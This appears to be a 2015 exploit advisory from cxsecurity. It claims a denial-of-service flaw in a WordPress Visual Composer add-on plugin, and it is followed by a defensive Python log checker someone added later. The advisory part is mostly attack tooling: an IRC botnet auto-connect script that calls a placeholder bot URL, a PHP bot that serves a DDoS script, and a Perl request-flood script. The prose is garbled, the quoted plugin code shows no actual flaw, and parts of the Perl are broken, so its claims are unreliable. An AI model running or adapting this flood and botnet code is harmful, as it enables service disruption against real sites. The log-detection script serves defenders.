Wordpress Crash Ultimate Addons for Visual Composer vulnerability

Published: 2015.09.10
Credit: Ashiyane Digital Security Team
Risk: Medium
CWE: N/A
CVE: N/A
Local: No
Remote: Yes

/************************************************************************************************
[+] Exploit Title : Wordpress Crash Ultimate Addons for Visual Composer vulnerability

[+] Exploit Author : Ashiyane Digital Security Team

[+] Tested on : Windows - Firefox

[+] Vendor Homepage : http://codecanyon.net/item/ultimate-addons-for-visual-composer/6892199

[+] Version: 3.12.0
*************************************************************************************************/

----------------------------------------
- vulnerability Ultimate_VC_Addons.php -
----------------------------------------

This part increases the pressure that visitors put on the WordPress core; it is a denial of service by means of visits.

However, we try to write 0day to the target affect scenarios

Example : https://www.exploit-db.com/wp-content/plugins/Ultimate_VC_Addons/README

Our present method by transferring the channel expansion as we botnet

This is the mSL syntax your script needs to connect to other networks.

--->

{
update_option('ultimate_vc_addons_redirect',true);
$memory = ini_get('memory_limit');
$allowed_memory = preg_replace("/[^0-9]/","",$memory)*1024*1024;
$peak_memory = memory_get_peak_usage(true);
if($allowed_memory - $peak_memory <= 14436352){
$pre = __('Unfortunately, plugin could not be activated. Not enough memory available.','ultimate_vc');
$sub = __('Please contact', 'ultimate_vc');
trigger_error( $pre.' '.$sub.' <a href="https://www.brainstormforce.com/support/">'.__('plugin support',
'ultimate_vc').'</a>.',E_USER_ERROR );
}

<---

---------------------------------------

=====================
= mSL Auto Connect: =
=====================


on *:Connect: {
/url -an www.exmple.com/bot.php
}

on *:START:{

server irc.network.com -i <nick> -j #channel,#channel
server irc.network.com -i <nick> -j #channel,#channel

}

=====================
= PHP Bot =
=====================

<?php
error_reporting(0);
$file1 = 'DDoS.pl';
$file_headers = @get_headers($file1);
if($file_headers[0] == 'HTTP/1.1 404 Not Found') {
break;

}else {
$s=file_get_contents($file1);
echo $s;
}
?>

=====================
= DDoS Perl =
=====================

#!/usr/bin/perl
#
# Title : allowed memory size exhausted
# Author : Ashiyane Digital Security Team
# Improvement Code : Und3rgr0und

use IO::Socket;

$ip="127.0.0.1";
$port="80";
$counter =0;


@attackpattern=("'");
for ($x=0;$x<=600;$x++){
$headerLine="GET /Ultimate_VC_Addons/ HTTP/1.0nn";
@temp=split(/(/)/,$headerLine);
foreach (@temp){
$replaceme=$_;
foreach(@attackpattern){
$attack=$_;
$newheaderline=$headerLine;
$newheaderline=~ s/$replaceme/$attack/i;
$remote=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip, PeerPort=>$port, Timeout=>5) or die "Connection impossiblen";
print $remote $newheaderline;
print "nRequest: ".$counter++." t".$newheaderline."n";
$remote->close;
}
}
}

---------------------------------------

Discovered by : Und3rgr0und
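
For defenders, a log check for the request pattern this advisory describes (repeated hits on the Ultimate_VC_Addons path from one client, including malformed request lines). This is an added example, not part of the original advisory; it assumes combined-format access logs in time order, and the threshold, window, sample addresses, status codes and asset path are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined-log-format prefix. The request field is captured whole because the
# request line may be malformed (a "'" in place of a "/") and still name the plugin.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')
PLUGIN_RE = re.compile(r'Ultimate_VC_Addons', re.IGNORECASE)

def find_bursts(lines, threshold=20, window=timedelta(seconds=10)):
    """Return {ip: peak hits in any window} for clients at or above threshold."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    peak = defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not PLUGIN_RE.search(m.group('req')):
            continue
        ts = datetime.strptime(m.group('ts'), '%d/%b/%Y:%H:%M:%S %z')
        q = recent[m.group('ip')]
        q.append(ts)
        while ts - q[0] > window:   # drop hits that fell out of the window
            q.popleft()
        peak[m.group('ip')] = max(peak[m.group('ip')], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}

def sample_log():
    """Constructed sample: one noisy client and one ordinary visitor."""
    lines = []
    for i in range(30):   # 30 hits in 3 seconds from a documentation-range address
        sec = i // 10
        req = "GET /Ultimate_VC_Addons/ HTTP/1.0" if i % 2 else "GET 'Ultimate_VC_Addons/ HTTP/1.0"
        status = 500 if i % 2 else 400
        lines.append(f'203.0.113.7 - - [10/Sep/2015:12:00:{sec:02d} +0000] "{req}" {status} 0 "-" "-"')
    for i in range(3):    # ordinary asset loads, 20 seconds apart (hypothetical path)
        lines.append(f'198.51.100.9 - - [10/Sep/2015:12:00:{i * 20:02d} +0000] '
                     f'"GET /wp-content/plugins/Ultimate_VC_Addons/assets/a.css HTTP/1.1" 200 512 "-" "-"')
    return lines

if __name__ == "__main__":
    for ip, n in find_bursts(sample_log()).items():
        print(f"{ip}: {n} plugin requests within 10s")
```

Clients returned by `find_bursts` are candidates for rate limiting at the web server or WAF; tune the threshold against normal traffic for the site.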


Copyright 2017, cxsecurity.com